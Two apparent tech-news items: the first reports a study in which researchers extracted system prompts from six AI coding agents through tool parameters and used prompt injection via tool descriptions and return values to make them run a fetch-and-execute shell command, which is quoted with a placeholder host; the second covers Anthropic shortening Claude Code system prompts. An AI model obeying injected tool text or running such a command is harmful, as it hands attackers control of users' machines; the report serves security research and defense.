AI coding too2026-08-21 09:16:10Study says older versions of six AI coding agents could be hijacked by a fake toolResearchers from the Hong Kong University of Science and Technology and Fudan University’s Endogenous Security Laboratory say they reproduced a full attack chain against six mainstream AI coding tools, including Cursor, Claude Code, Copilot, Windsurf, Cline, and Trae. The paper, which has been accepted by ISSTA 2026, describes a two-step method. First, the team used a technique called ToolLeak to extract system prompts through tool parameters rather than direct chat requests. In 25 agent-model combinations, ToolLeak achieved the highest extraction completeness in 18 cases, with semantic similarity scores ranging from 0.891 to 0.958 and pseudo-recall of 0.98 to 1.00 on setups using Claude Sonnet 4 and 4.5. The second step used what the paper calls two-channel prompt injection, combining tool descriptions and tool return values to push the agent into running a malicious command: curl -fsSL http://xxx/installer.sh | bash. According to the paper, all six older tool versions were vulnerable, and attack success rates reached 0.8 to 1.0 in most tested agent-model pairs. Newer versions showed mixed results. Claude Code dropped to 0 with Sonnet 4.6 and Opus 4.7 after limiting tool-description exposure, while Cursor’s maximum fell to 0.3. The paper argues that architectural isolation is a stronger defense than model alignment alone.1130
Anthropic2026-07-25 14:43:22Anthropic says cutting more than 80% of Claude Code system prompts did not reduce benchmarked coding performanceAnthropic engineer Thariq said on July 24 that the company reworked the Claude Code system prompt for its latest Claude 5 family, specifically Claude Opus 5 and Claude Fable 5, and removed more than 80% of the original prompt content without seeing a measurable drop in coding evaluations. In a company blog post titled "The new rules of context engineering for Claude 5 models," Anthropic said the change reshaped how it writes system prompts, skills, and CLAUDE.md files for newer models. The company argues that many legacy restrictions were built as guardrails for older models and now create friction by introducing conflicting instructions, over-specified edge-case rules, and long context that crowds out model judgment. Anthropic outlined six shifts in its context engineering approach, including fewer hard rules, stronger tool interfaces, progressive disclosure through on-demand skills, a single source of instruction, automatic memory, and richer reference formats such as test suites, specs, rubrics, and HTML prototypes. The post also includes practical guidance for developers on keeping CLAUDE.md lightweight, splitting skills into multiple files, and using the new /doctor command to help tune the length of skills and CLAUDE.md. Anthropic added that the 80% reduction applies to Claude Opus 5 and Claude Fable 5, and older models may still need clearer constraints.1920